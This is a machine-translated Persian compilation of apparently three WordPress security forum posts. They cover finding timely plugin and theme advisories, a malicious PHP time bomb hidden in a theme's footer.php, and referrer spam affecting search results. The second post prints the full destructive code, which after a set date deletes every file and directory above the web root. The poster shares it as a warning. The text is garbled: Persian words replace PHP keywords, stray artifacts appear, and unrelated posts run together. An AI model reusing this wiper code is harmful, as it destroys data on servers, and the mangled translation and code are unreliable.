من می خواهم راهنمایی های امنیتی به موقع را برای وردپرس دریافت کنم و البته از وردپرس منظورم تمام نرم افزاری است که به طور کلی نصب شده است: هسته وردپرس، پلاگین ها و تم ها. من هیچ چیزی رسمی پیدا نکردم، به جز وبلاگ WordPress.org که هر بار انتشار امنیتی ایجاد می شود، اما اخبار فقط شامل هسته وردپرس (بدون افزونه ها یا تم ها) می شوند. سپس پایگاه داده آسیب پذیری WPScan (wpvulndb.com) وجود دارد، اما من نمی دانم چطوری "کامل" است، و من نمی دانم که آیا اخبار به موقع است و یا می تواند تاخیری وجود داشته باشد. همچنین به نظر میرسد که این پایگاه داده با استفاده از ابزارهای خودکار برای جلوگیری از نصب Worpdress مورد استفاده قرار میگیرد، بنابراین ممکن است با توجه به زمان آسیبپذیری که در آن وجود دارد، ممکن است خیلی دیر شود زیرا مهاجمان از آن برای اسکن استفاده میکنند. چک کردن صفحات رسمی برای هر پلاگین یا تم ممکن است یک گزینه باشد، اگر چه ممکن است یک درد در گردن باشد (اما RSS میتواند کمک کند)، اما من فکر نمیکنم اطلاعاتی که برخی از توسعه دهندگان درباره بهروزرسانیهای آنها ارائه میدهند همیشه روشن است. به عنوان مثال، من چند پلاگین را که در WPScan ذکر شده است را بررسی کردم و در حالی که یکی به صراحت "اولویت بالا" و "آسیب پذیری" را در فهرست تغییرات ذکر می کند، دیگر به سادگی بیان می کند: "add nonce و غیره" بدون هیچ مرجع واقعا صریح یا چشم نواز به یک تعمیر امنیتی. من شرط می بندم حتی حتی به ذکر هر چیزی برای جلوگیری از "ترساندن" کاربران خود. آخرین گزینه ای که من پیدا کردم لیست ایمیل WordFence است، شما مشترک و شما باید هشدار از طریق ایمیل دریافت کنید. به نظر میرسد خدماتی است که در پشت پلاگین امنیتی برای وردپرس ایجاد شده است، بنابراین دوباره چیزی جز رسمی نیست و من هیچ راهی برای ارزیابی قابلیت اطمینان آن ندارم. آیا گزینه های خوبی وجود دارد که من از آنها آگاه نیستم؟ چگونه می توانم با تمام این منابع مقابله کنم بدون این که دیوانه بشمارم دو بار چک کردن چندین وب سایت را بررسی کنم؟
دلیل این امر: من اساسا به دنبال راهی برای دریافت مشاوره های امنیتی به موقع هستم، بنابراین می توانم تصمیم بگیرم که با بعضی از وب سایت های WordPress چه کار کنم که تحت کنترل من هستند به محض انتشار یک به روز رسانی می توانم همه چیز را به روز رسانی کنم، من می توانم مسائل مربوط به خرابکاری را برطرف کنم و به روزرسانی ها باید آزمایش شود. اما اگر یک بروزرسانی فوری باشد زیرا آن را در معرض آسیب جدی قرار می دهد، اگر من آن را در اسرع وقت دانستم، می توانم تصمیم بگیرم چه کاری باید انجام دهم، شاید تصمیم بگیرد که خطر شکستن وب سایت را به خطر بیندازد و یا آن را به موقع به روزرسانی کند تا تصمیم بگیرد برای غیر فعال کردن آن و تغییر پوشه آن به طور موقت در حالی که من به روز رسانی ها را در یک محیط پیمایش تست می کنم. اما البته برای انجام این کار، من نیاز به توصیه های امنیتی دارم که قابل اعتماد و کامل هستند (از جمله پلاگین ها و تم هایی که من استفاده می کنم) و قطعا به موقع (حتی ممکن است یک تاخیر یک روزه ممکن است دشوار باشد اگر حملات خودکار در وحشی ظاهر شود) 19659003]
virus – کد PHP مخرب حذف همه فایل ها در FTP
چند ماه پیش برخی از وبسایتهای من هک شده بودند. FTP ها ظاهرا خالی بودند، هنگام بارگیری سایت ها، خطای 403 را دریافت کردم. اگر سعی کردم پشتیبان گیری FTP ها را بارگیری کنم و فایل سیستم را بررسی کنم، همه فایل ها وجود داشت. با این حال، زمانی که سعی کردم سایت را باز کنم، 403 دریافت کردم و FTP دوباره خالی بود.
من تمام فایل ها را اسکن کرده ام و یک فایل مخرب در فایل های خود پیدا کردم. کد همیشه در فایل footer.php در پوشه تم وردپرس من و همچنین در footer.php در CMS سفارشی من واقع شده است.
کد اساسا فایل سیستم را اسکن می کند، ریشه را پیدا می کند و سپس در زمان مشخص شده خود را اجرا می کند و تمامی فایل ها را حذف می کند. اگر نسخه پشتیبان تهیه کنید، اگر فردی وب سایت را باز کند، دوباره آن را حذف می کند. این چیزی است که کد به نظر می رسد:
<؟
$ today = تاریخ ("Y-m-d H: i: s")؛
$ date = "2018-05-01 00:00:00"؛
function listFolderFiles ($ dir) {
$ ffs = scandir ($ dir)؛
unset ($ ffs [array_search('.', $ffs, true)])؛
Unset ($ ffs [array_search('..', $ffs, true)])؛
// جلوگیری از عناصر دستورالعمل خالی
اگر (count ($ ffs) <1)
برگشت؛
foreach ($ ffs به عنوان $ ff) {
اگر (! is_dir ($ dir. '/'. $ ff)) unlink ($ dir. '/'. $ ff)؛
اگر (is_dir ($ dir. '/'. $ ff)) listFolderFiles ($ dir. '/'. $ ff)؛
}
}
تابع rmDirs ($ dir) {
$ emptyDir = false؛
$ ffs = scandir ($ dir)؛
unset ($ ffs [array_search('.', $ffs, true)])؛
Unset ($ ffs [array_search('..', $ffs, true)])؛
// جلوگیری از عناصر دستورالعمل خالی
اگر (count ($ ffs) < 1)
return true;
foreach($ffs as $ff) {
if(is_dir($dir.'/'.$ff)) $emptyDir = rmDirs($dir.'/'.$ff);
if($emptyDir) {
if(is_dir($dir.'/'.$ff)) rmdir($dir.'/'.$ff);
rmDirs($dir);
}
}
return false;
}
if ($today > $ date) {
listFolderFiles (dirname ($ _ سرور ['DOCUMENT_ROOT']))؛
rmDirs (dirname ($ _ سرور ['DOCUMENT_ROOT']))؛
}
؟>
دقیقا همین اتفاق برای من افتاد. اولین بار این تاریخ در نیمه شب به 1 فوریه تنظیم شد و اکنون در نیمه شب به 1 ماه مه تنظیم شده است. کد همیشه در فایل حداقل دو هفته قبل از تاریخ مشخص شده قرار می گیرد. میزبانی وب که من استفاده می کنم، هر روز 14 روز پشتیبان گیری FTP های خود را به صورت خودکار انجام می دهم، بنابراین حدس می زنم این نقطه قرار دادن کد در زمان پیش است.
چیزی که من در مورد هر موضوعی پیدا نکردم این کد خاص، هر تکه ای از آن را آنلاین، بنابراین من حدس می زنم ممکن است به صورت سفارشی نوشته شده است – من در یک سازمان دیجیتال کار می کند، بنابراین احتمالا توسط رقبای کسب و کار ما.
من آن را ثابت کرده ام، ما بهترین ها را برای حفظ این اتفاق می افتد دوباره، اما من می خواهم دیگران در مورد این کد بدانند و برای پیدا کردن آن. همچنین، اگر برخی از منابع شناخته شده این، من می خواهم بدانم. با تشکر!
حملات – اشاره گر جعلی بر نتایج جستجو گوگل من تاثیر می گذارد
نتایج جستجو گوگل در وردپرس من متفاوت از محتوای اصلی است. ما خدمات متخصص امنیت را گرفته ایم و آنها سایت و پایگاه داده را اسکن کرده اند اما در کد و پایگاه داده تغییری وجود ندارد. آنها هیچ آسیب پذیری پلاگین یا نوع مشابهی از حمله پیدا نکردند. کد و پایگاه داده پاک بود.
فقط چیزی که ما در مجله دسترسی پیدا کردیم که هر روز 10-20 درخواست در سرور من ارسال می شود، اما رجیستر، سایت های عامیانه یا سایت های دارویی است. ما نمی توانیم بلافاصله آن را پیدا کنیم زیرا هزاران درخواست که روزانه دریافت می کنیم وجود دارد و این فقط 10 تا 20 است اما به طور مرتب به آنها حمله می شود. ممکن است این دلیل باشد، محتوای سایت من در نتایج جستجوی گوگل متفاوت است.
ما هر نشانی اینترنتی را با استفاده از روش حذف گوگل پاک کردیم، اما اکنون بعد از یک ماه جستجو کردیم، نتایج جعلی دوباره ظاهر می شوند. اگر کد و پایگاه داده تمیز باشد، حمله ارجاعی جعلی ممکن است برای نتایج جستجوی اصلاح شده باشد.
لطفا اطلاعاتی راجع به این قسمت به اشتراک بگذارید.
با تشکر
